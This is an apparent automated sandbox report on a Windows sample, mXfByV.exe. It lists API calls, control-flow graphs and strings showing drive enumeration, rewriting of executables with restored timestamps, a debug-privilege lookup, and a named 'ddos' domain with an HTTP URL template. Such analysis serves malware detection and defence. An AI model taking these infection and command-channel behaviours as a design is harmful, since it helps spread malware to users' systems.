312->323 324 6464ab-6464c0 312->324 313->312 314->308 325 646583-646587 323->325 326 64651d-64651e 323->326 330 646535-646537 324->330 331 6464c2 324->331 328 646588-64658b 325->328 329 646522-646533 326->329 332 6465a1-6465a3 328->332 333 64658d-64658f 328->333 329->330 334 646539 330->334 335 64659a 330->335 336 6464c5-6464cd 331->336 337 6464f8 331->337 343 646591-646593 333->343 344 6465b4 334->344 345 64653b-646541 334->345 338 64659b-64659d 335->338 339 646542-646545 336->339 340 6464cf-6464d4 336->340 341 64656c-64656f 337->341 342 6464fa-6464fe 337->342 338->343 346 64659f 338->346 347 64654d-646550 339->347 348 6464d6-6464d9 340->348 349 646517-646518 340->349 351 646572 341->351 342->351 352 646500 342->352 343->338 353 646595 343->353 350 6465be-6465db 344->350 345->339 346->328 347->350 354 646552-646556 347->354 348->347 355 6464db-6464f5 348->355 349->323 361 6465dd-6465f6 350->361 357 646573-646576 351->357 352->329 358 646502 352->358 353->335 359 646578-64657a 354->359 360 646558-646569 354->360 355->337 357->359 358->357 362 646504-646513 358->362 359->361 364 64657c 359->364 360->341 363 6465f7-646608 361->363 362->330 365 646515 362->365 364->363 366 64657e-64657f 364->366 365->349 366->325
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 006460BE
                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006460DF
                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00646189
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006461A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: a03e763b9a708c890813b2202750f187b8ac4687c2b0437afe9192a2f79369ce
                          • Instruction ID: 780ad9bed4f0b332ad9bce20be41139d348ae7ca8aa8362dbe5240d283b2ac79
                          • Opcode Fuzzy Hash: a03e763b9a708c890813b2202750f187b8ac4687c2b0437afe9192a2f79369ce
                          • Instruction Fuzzy Hash: 621245B25087849FDB368F64CC55BEA3BB2EF03310F1845AEF8858B693D674A901C756

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 367 642b8c-642bc6 memset GetLogicalDriveStringsA 368 642bc8-642bcc 367->368 369 642c09-642c28 WaitForMultipleObjects 367->369 370 642bce-642bd0 368->370 371 642bfa-642c07 lstrlen 368->371 372 642c3c-642c45 369->372 373 642c2a-642c3a CreateThread 369->373 370->371 374 642bd2-642bdc GetDriveTypeA 370->374 371->368 371->369 373->372 374->371 375 642bde-642be1 374->375 375->371 376 642be3-642bf6 CreateThread 375->376 376->371
                          APIs
                          • memset.MSVCRT ref: 00642BA6
                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00642BB4
                          • GetDriveTypeA.KERNEL32(?), ref: 00642BD3
                          • CreateThread.KERNEL32(00000000,00000000,00642B7D,?,00000000,00000000), ref: 00642BEE
                          • lstrlen.KERNEL32(?), ref: 00642BFB
                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00642C16
                          • CreateThread.KERNEL32(00000000,00000000,00642845,00000000,00000000,00000000), ref: 00642C3A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                          • String ID:
                          • API String ID: 1073171358-0
                          • Opcode ID: c7ae9e6dea723646f570cba3df6c27146dc2547ce2b5935a4732beaa7c0ab111
                          • Instruction ID: e1cbd16166f5430e35e8aad0b5e5acd719f4ecdfa68166c9571618e00824cb83
                          • Opcode Fuzzy Hash: c7ae9e6dea723646f570cba3df6c27146dc2547ce2b5935a4732beaa7c0ab111
                          • Instruction Fuzzy Hash: 1521D5B580015EAFE720AF64AC84EEF7B6FFB06748B650229F942D3251D7308D06CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 641e6e-641e95 call 642d60 3 641e97 call 641d8a 0->3 4 641e9c-641eaa call 641df6 0->4 3->4 8 641eb0-641ed9 SetFileAttributesA CreateFileA 4->8 9 642332 4->9 8->9 10 641edf-641f28 call 641915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 642338-64233b 9->11 10->9 18 641f2e-641f39 10->18 13 642346-642349 11->13 14 64233d-642340 UnmapViewOfFile 11->14 16 642350-642354 13->16 17 64234b-64234e CloseHandle 13->17 14->13 19 642356-64235b CloseHandle 16->19 20 642391-64239a call 642d9b 16->20 17->16 18->9 22 641f3f-641f56 18->22 19->20 22->9 24 641f5c-641f64 22->24 24->9 25 641f6a-641f70 24->25 25->9 26 641f76-641f87 call 641c81 25->26 26->9 29 641f8d-641fa7 call 64185b call 641c81 26->29 29->9 34 641fad-641fb4 29->34 35 642024-642045 34->35 36 641fb6-641fc5 call 641af9 34->36 35->9 37 64204b-64204e 35->37 36->35 44 641fc7-641fd2 36->44 39 642070-6420f4 call 641af9 * 2 call 641c68 * 2 memset * 2 37->39 40 642050-642053 37->40 62 6420f5-6420fe 39->62 42 642056-64205a 40->42 42->39 45 64205c-642061 42->45 44->9 47 641fd8-641fe7 44->47 45->9 48 642067-64206e 45->48 50 641fef-642006 call 641af9 47->50 51 641fe9-641fec 47->51 48->42 56 642013-64201e FlushViewOfFile 50->56 57 642008-64200e call 641c68 50->57 51->50 56->35 57->56 63 642130-642139 62->63 64 642100-642114 62->64 67 64213c-642142 63->67 65 642116-64212a 64->65 66 64212d-64212e 64->66 65->66 66->62 68 642144-642150 67->68 69 64215c 67->69 70 642157-64215a 68->70 71 642152-642154 68->71 72 64215f-642162 69->72 70->67 71->70 73 642164-642171 72->73 74 642181-642184 72->74 77 642177-64217e 73->77 78 64232a-64232d 73->78 75 642186 74->75 76 64218d-6421ba call 641c68 74->76 75->76 81 6421d3-64220b call 641c81 call 641c68 76->81 82 6421bc-6421d0 call 641c68 76->82 77->74 78->72 89 64220d-642218 call 641c68 81->89 90 64221b-64221e 81->90 82->81 89->90 91 642226-642328 memcpy UnmapViewOfFile CloseHandle call 641b8a call 64185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 641915 CloseHandle 90->91 92 642220-642223 90->92 91->11 92->91
                          APIs
                          • SetFileAttributesA.KERNEL32(?,00000080,?,006432B0,00000164,00642986,?), ref: 00641EB9
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00641ECD
                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00641EF3
                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00641F07
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00641F1D
                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0064201E
                          • memset.MSVCRT ref: 006420D8
                          • memset.MSVCRT ref: 006420EA
                          • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0064222D
                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00642238
                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0064224A
                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422C6
                          • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422CB
                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422DD
                          • WriteFile.KERNEL32(000000FF,00644008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422F7
                          • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0064230D
                          • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00642322
                          • UnmapViewOfFile.KERNEL32(?,?,006432B0,00000164,00642986,?), ref: 00642340
                          • CloseHandle.KERNEL32(?,?,006432B0,00000164,00642986,?), ref: 0064234E
                          • CloseHandle.KERNEL32(000000FF,?,006432B0,00000164,00642986,?), ref: 00642359
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                          • String ID: .@d$5@d$<@d$C@d$m@d
                          • API String ID: 3043204753-2045934198
                          • Opcode ID: c2740679d517a3e86325a1451f12c9ac2ef43c140a6e02f5b286a3c3ce667949
                          • Instruction ID: 9fcb3d5e96e7916a6e8c9de6e94fb72d4173ba26f1f7ea51926d3596f3d0be3c
                          • Opcode Fuzzy Hash: c2740679d517a3e86325a1451f12c9ac2ef43c140a6e02f5b286a3c3ce667949
                          • Instruction Fuzzy Hash: 97F17A74900209EFCB20DFA4DC91AADBBB6FF09304F60452AF519AB661D734AE81CF54

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 117 641973-64199a PathFileExistsA 118 641ac7-641acc 117->118 119 6419a0-6419aa 117->119 120 641ad0-641ad5 118->120 121 641ace 118->121 122 6419af-6419c2 CreateFileA 119->122 125 641ad7-641ad9 120->125 126 641af0-641af6 120->126 121->120 123 6419c4-6419d3 Sleep 122->123 124 641a28-641a36 GetFileSize 122->124 123->122 127 6419d5-641a0b call 64185b wsprintfA CopyFileA 123->127 128 641a87-641a8b 124->128 129 641a38-641a3b 124->129 125->126 127->124 141 641a0d-641a26 CreateFileA 127->141 132 641a96-641a9a 128->132 133 641a8d-641a90 CloseHandle 128->133 129->128 131 641a3d-641a51 VirtualAlloc 129->131 131->128 135 641a53-641a57 131->135 136 641a9c 132->136 137 641aad-641ab1 132->137 133->132 142 641a80 135->142 143 641a59-641a6d ReadFile 135->143 138 641aa0-641aa7 DeleteFileA 136->138 139 641ab3-641ab6 137->139 140 641adb-641ae0 137->140 138->137 139->118 144 641ab8-641ac1 VirtualFree 139->144 146 641ae7-641aec 140->146 147 641ae2-641ae5 140->147 141->124 145 641a9e 141->145 142->128 143->128 148 641a6f-641a7e 143->148 144->118 145->138 146->126 149 641aee 146->149 147->146 148->142 148->143 149->126
                          APIs
                          • PathFileExistsA.SHLWAPI(\Nd`Nd,00000000,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641992
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006419BA
                          • Sleep.KERNEL32(00000064), ref: 006419C6
                          • wsprintfA.USER32 ref: 006419EC
                          • CopyFileA.KERNEL32(?,?,00000000), ref: 00641A00
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00641A1E
                          • GetFileSize.KERNEL32(?,00000000), ref: 00641A2C
                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00641A46
                          • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00641A65
                          • CloseHandle.KERNEL32(000000FF), ref: 00641A90
                          • DeleteFileA.KERNEL32(?), ref: 00641AA7
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00641AC1
                          Strings
                          • C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 0064197C
                          • %s%.8X.data, xrefs: 006419E6
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 006419DB
                          • \Nd`Nd, xrefs: 00641980
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                          • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mXfByV.exe$\Nd`Nd
                          • API String ID: 716042067-3642655191
                          • Opcode ID: 92e1f96466dffbe9bfa620597f33f61e31f9120286259171705a591a6a80b602
                          • Instruction ID: d1ea2e89c8d365237c51aca71c59278356398f74165c92990a6cae2c3eaebbbf
                          • Opcode Fuzzy Hash: 92e1f96466dffbe9bfa620597f33f61e31f9120286259171705a591a6a80b602
                          • Instruction Fuzzy Hash: 17514E71901259EFCF209F98CC84AEEBBBAFB06754F104669F515EA290D3709EC0CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 150 6428b8-6428ff memset wsprintfA 151 642905-64290d 150->151 152 6429db-6429df 150->152 151->152 153 642913-642919 151->153 154 642956-642965 strrchr 153->154 155 64291b-64294c memset wsprintfA call 6429e2 153->155 154->152 157 642967-642978 lstrcmpiA 154->157 158 642951 155->158 159 642988-642992 lstrcmpiA 157->159 160 64297a-642981 call 641e6e 157->160 158->152 159->152 161 642994-64299b 159->161 165 642986 160->165 163 6429ad-6429c9 strstr 161->163 164 64299d-6429a3 161->164 167 6429d3-6429d6 call 642692 163->167 168 6429cb-6429d1 call 64239d 163->168 164->163 166 6429a5-6429a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                          APIs
                          • memset.MSVCRT ref: 006428D3
                          • wsprintfA.USER32 ref: 006428F7
                          • memset.MSVCRT ref: 00642925
                          • wsprintfA.USER32 ref: 00642940
                            • Part of subcall function 006429E2: memset.MSVCRT ref: 00642A02
                            • Part of subcall function 006429E2: wsprintfA.USER32 ref: 00642A1A
                            • Part of subcall function 006429E2: memset.MSVCRT ref: 00642A44
                            • Part of subcall function 006429E2: lstrlen.KERNEL32(?), ref: 00642A54
                            • Part of subcall function 006429E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00642A6C
                            • Part of subcall function 006429E2: strrchr.MSVCRT ref: 00642A7C
                            • Part of subcall function 006429E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00642A9F
                            • Part of subcall function 006429E2: lstrlen.KERNEL32(Documents and Settings), ref: 00642AAE
                            • Part of subcall function 006429E2: memset.MSVCRT ref: 00642AC6
                            • Part of subcall function 006429E2: memset.MSVCRT ref: 00642ADA
                            • Part of subcall function 006429E2: FindFirstFileA.KERNEL32(?,?), ref: 00642AEF
                            • Part of subcall function 006429E2: memset.MSVCRT ref: 00642B13
                          • strrchr.MSVCRT ref: 00642959
                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 00642974
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                          • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                          • API String ID: 3004273771-1791786966
                          • Opcode ID: eff273e38949edb9861d0a8cc199f59f2eae95927d09aad23c3a05d16c2f92fb
                          • Instruction ID: a47b8da85f323850ebce14a58aaee0d353b0900faa3928abfac49d75155b1192
                          • Opcode Fuzzy Hash: eff273e38949edb9861d0a8cc199f59f2eae95927d09aad23c3a05d16c2f92fb
                          • Instruction Fuzzy Hash: FF31297694031E7BDB20AB66DCA5FCA376EAF11710F640456F545E3280EBF4DAC48BA0

                          Control-flow Graph

                          APIs
                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0064164F
                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0064165B
                          • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\mXfByV.exe,00000104), ref: 0064166E
                          • CreateThread.KERNEL32(00000000,00000000,00641099,00000000,00000000,00000000), ref: 006416AC
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006416BD
                            • Part of subcall function 0064139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 006413BC
                            • Part of subcall function 0064139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006413DA
                            • Part of subcall function 0064139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00641448
                          • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 006416E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mXfByV.exe$C:\Windows\system32$Documents and Settings
                          • API String ID: 123563730-3829935983
                          • Opcode ID: b29855f7ca867ed7e0951f1126782e2b984c460435efc7e3d8e9a209c5fa6ddc
                          • Instruction ID: 4f1864c73029a882d5d213d030c8fd18e5a409f6f44c341ad4de8955909aa025
                          • Opcode Fuzzy Hash: b29855f7ca867ed7e0951f1126782e2b984c460435efc7e3d8e9a209c5fa6ddc
                          • Instruction Fuzzy Hash: 88110475540224BBCF206BA0AD4FFDB3E6FEF13B61F101215F209992A0CA718980CBB1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 641000-641023 CreateFileA 206 641025-641055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 641092-641096 205->207 208 641057-64105f 206->208 209 64107b-641085 206->209 212 641074-641075 UnmapViewOfFile 208->212 213 641061-64106e call 6417d0 208->213 210 641087-64108b CloseHandle 209->210 211 64108d-641091 CloseHandle 209->211 210->211 211->207 212->209 213->212
                          APIs
                          • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGd,http://%s:%d/%s/%s,006410E8,?), ref: 00641018
                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 00641029
                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00641038
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0064104B
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00641075
                          • CloseHandle.KERNEL32(?), ref: 0064108B
                          • CloseHandle.KERNEL32(00000000), ref: 0064108E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                          • String ID: HGd$ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 1223616889-1949565679
                          • Opcode ID: 748bbf452d2ba31016b9ad16ad137340e0cdf81f31c99ca61530037e65a7390a
                          • Instruction ID: 40ffb1ad3f828c43a3b036503091745c5d014a6479c5cc6e10b6b8362aa0d13f
                          • Opcode Fuzzy Hash: 748bbf452d2ba31016b9ad16ad137340e0cdf81f31c99ca61530037e65a7390a
                          • Instruction Fuzzy Hash: 6301967510035CBFE7306F609C88E6BBBAEDB45B99F004629F245A6690DA705E848B70

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 377 642c48-642c75 memset call 641973 380 642c77-642c7f 377->380 381 642cb2-642cb9 377->381 382 642c81-642c8b 380->382 383 642c8f-642cac CreateThread WaitForMultipleObjects 380->383 384 642cc8-642ccc 381->384 385 642cbb-642cc2 VirtualFree 381->385 382->383 383->381 385->384
                          APIs
                          • memset.MSVCRT ref: 00642C57
                            • Part of subcall function 00641973: PathFileExistsA.SHLWAPI(\Nd`Nd,00000000,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641992
                            • Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006419BA
                            • Part of subcall function 00641973: Sleep.KERNEL32(00000064), ref: 006419C6
                            • Part of subcall function 00641973: wsprintfA.USER32 ref: 006419EC
                            • Part of subcall function 00641973: CopyFileA.KERNEL32(?,?,00000000), ref: 00641A00
                            • Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00641A1E
                            • Part of subcall function 00641973: GetFileSize.KERNEL32(?,00000000), ref: 00641A2C
                            • Part of subcall function 00641973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00641A46
                            • Part of subcall function 00641973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00641A65
                          • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00642C99
                          • WaitForMultipleObjects.KERNEL32(00000001,006416BA,00000001,000000FF,?,006416BA,00000000), ref: 00642CAC
                          • VirtualFree.KERNEL32(01240000,00000000,00008000,C:\Users\user\AppData\Local\Temp\mXfByV.exe,00644E5C,00644E60,?,006416BA,00000000), ref: 00642CC2
                          Strings
                          • C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 00642C69
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                          • String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe
                          • API String ID: 2042498389-246659021
                          • Opcode ID: f4804caf46bc5d36a751ea49074f8b32c18418a173807b52b2117334e3a91157
                          • Instruction ID: 0ee2ab0bce54c88ddecd603a4bdfa02b7dbf6986f9d79f1c599b783969af44ba
                          • Opcode Fuzzy Hash: f4804caf46bc5d36a751ea49074f8b32c18418a173807b52b2117334e3a91157
                          • Instruction Fuzzy Hash: 8A01DF756412207AD750ABA5AC5AFEF7FAEEF02B20F604124B604D62C1DAA09A40C3E0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 386 6414e1-6414fb 387 641541-641547 386->387 388 6414fd-641510 GetModuleHandleA 386->388 391 641573-641574 call 641638 387->391 392 641549-64154c 387->392 389 641512-641518 388->389 390 64151a-641535 VirtualQuery 388->390 389->387 393 641537-641539 390->393 394 64153b 390->394 399 641579-64157a ExitProcess 391->399 395 64154e-641555 392->395 396 641569-641570 392->396 393->387 393->394 394->387 395->396 398 641557-641566 call 641af9 395->398 398->396
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000), ref: 00641504
                          • VirtualQuery.KERNEL32(006414E1,?,0000001C), ref: 00641525
                          • ExitProcess.KERNEL32 ref: 0064157A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: ExitHandleModuleProcessQueryVirtual
                          • String ID:
                          • API String ID: 3946701194-0
                          • Opcode ID: 34df2f8ccfd51a8ab7ac86234e6c83c15af914ee0f96ce8e844e87fa9f0954b6
                          • Instruction ID: 8f8a424a31634572d18a7c568c69407d8be30e5eaa26d3d02e3d1dc11ee58fad
                          • Opcode Fuzzy Hash: 34df2f8ccfd51a8ab7ac86234e6c83c15af914ee0f96ce8e844e87fa9f0954b6
                          • Instruction Fuzzy Hash: EC1182B9D00214DFCB14EFA5A8867FD77BEEB86750B10613BF412DA250D7308981DB50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 402 641915-641922 403 641924-641926 402->403 404 641928-64192c 402->404 405 64196e-641970 403->405 406 64192e-64194d memset GetFileTime 404->406 407 64194f-641952 404->407 408 641966-641968 406->408 407->405 409 641954-641960 SetFileTime 407->409 410 64196c 408->410 411 64196a 408->411 409->408 410->405 411->410
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: FileTimememset
                          • String ID:
                          • API String ID: 176422537-0
                          • Opcode ID: 3182dff8775149e897b1d6fa8d6d6121ceb5f2f827ade6f490ff56aeb443cf81
